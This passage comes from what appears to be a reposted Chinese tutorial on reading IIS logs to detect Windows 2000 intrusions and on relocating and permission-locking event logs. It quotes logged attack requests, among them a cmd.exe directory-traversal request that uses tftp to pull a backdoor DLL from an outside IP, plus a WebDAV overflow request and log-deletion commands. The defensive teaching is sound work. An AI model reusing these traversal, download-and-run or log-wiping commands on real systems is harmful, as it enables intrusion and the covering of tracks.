则日志中会记录下此访问行为:
2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe
/c dir 200 -
看到了吗?我们的日志中记录地一清二楚,来自192.168.0.1的攻击者查看我们的目录。下面一行是向我们的机器传送后门程序的日志记录:
2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe
/c tftp -i 61.48.10.129 GET cool.dll c:\httpodbc.dll
502 –
看到了吧?记录非常详细的,系统里面那个程序在响应都记录了下来,这样我们分析入侵行为就好办了。
(2)WebDavx3远程溢出日志记录
过去一段时间有名的Wevdavx3漏洞是应用最广泛的,如果系统遭受了此远程溢出的攻击行为,则日志记录如图二所示。
2004-04-19 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
/AAAAA……
这表示我们的Web服务受到了来自192.168.0.218的攻击,并锁定(即关闭)了WEB服务,后面的一些乱码字符是在溢出攻击时使用的偏移位猜过程。
上面的几种日杂都记录了有入侵行为的IP地址,但此IP地址说不定就是攻击者使用了跳板,也就是说此IP很可能是“肉鸡”而不是攻击者的IP,遇到这样的情况,我们再查看其他日志文件,还是有可能追查出攻击者的位置的,但这个就完全靠管理员的经验了。
4.日志文件的移位保护
通过上面的几个方法,大家应该可以检测普通的系统攻击了,但话说回来,如果上面的攻击任何一个成功了,那现在我们都看不到日志了,早被入侵者清空了,所以,为了防患于未然,我们还是针对常见的删除日志的方法,把日志挪挪吧。
好多文章介绍对事件日志移位能做到对系统系统很好的保护,移位虽是一种保护方法,但只要在命令行输入dir c:\*.evt/s,一下就可查找到事件日志位置,再删除可容易了,那怎么办呢?其实日志移位要通过修改注册表来完成,找到注册表HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\ Services\Eventlog下面的Application、Security、System几个子键,分别对应“应用程序日志”、“安全日志”、“系统日志”。如何修改呢?下面我们具体来看看Application子键:File项就是“应用程序日志”文件存放的位置,把此键值改为要存放日志文件的文件夹,我们再把%systemroot%\system32\config\appevent.evt文件拷贝到此文件夹,再重启机器就可以了。
在此介绍移位的目的是为了充分利用Windows 2000在NTFS格式下的“安全”属性,如果不移位也无法对文件进行安全设置操作,右击移位后的“文件夹选择属性”,进入“安全”选项卡,不选择“允许将来自父系的可继承权限传播给该对象”,添加“System”组,分别给Everyone组“读取”权限,System组选择除“完全控制”和“修改”的权限。然后再将系统默认的日志文件512KB大小改为你所想要的大小,如20MB。进行了上面的设置后,直接通过Del C:\*.Evt/s/q来删除是删不掉的,相对要安全很多了。
通过上面的几个实际的例子,相信大家都应该具备分析普通入侵日志的能力了,再结合一定的实际经验,通过日志来发现系统漏洞、追踪入侵者就简单很多了。希望此文能抛砖引玉,给大家带来一些帮助。
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
